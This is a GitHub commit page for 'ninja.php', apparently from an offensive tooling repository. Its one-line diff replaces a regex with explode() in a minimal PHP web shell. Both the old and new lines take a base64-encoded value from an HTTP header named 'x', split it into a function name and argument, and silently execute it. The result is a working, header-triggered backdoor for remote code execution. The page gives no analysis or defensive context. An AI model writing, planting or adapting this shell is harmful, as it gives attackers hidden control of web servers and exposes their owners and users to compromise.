Skip to content

Commit

Permalink
replaced regex with explode
Browse files Browse the repository at this point in the history
  • Loading branch information
s0md3v authored May 27, 2018
1 parent fa2f1ad commit 790586a
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion ninja.php
Original file line number Diff line number Diff line change
@@ -1 +1 @@
<?preg_match('/(.*)\((.*)\)/',base64_decode(substr(getallheaders()['x'],1)),$c);@$c[1]($c[2]);
<?$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

0 comments on commit 790586a

Please sign in to comment.